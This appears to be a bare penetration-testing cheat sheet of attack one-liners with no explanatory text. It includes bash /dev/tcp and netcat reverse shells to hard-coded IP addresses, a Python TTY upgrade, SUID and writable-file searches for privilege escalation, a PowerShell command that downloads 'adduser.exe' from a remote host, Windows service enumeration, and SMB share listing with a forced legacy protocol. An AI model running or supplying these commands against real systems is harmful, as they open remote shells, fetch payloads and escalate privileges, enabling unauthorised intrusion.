bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

mkfifo pipe;/usr/bin/nc 192.168.92.131 9999<pipe|/bin/sh>pipe 2>pipe;rm pipe

python -c 'import pty; pty.spawn("/bin/bash")'

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -ug=rwx 2>/dev/null

cscript wget.vbs http://xxxx xxxx

find / -type f -name "*.log" | xargs grep "ERROR"

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Get-WmiObject win32_service | Select-Object PathName


powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.92.131/adduser.exe', 'adduser.exe')


wmic service where caption="Apache" get name,startmode


smbclient -L //10.11.1.8 --option='client min protocol=NT1'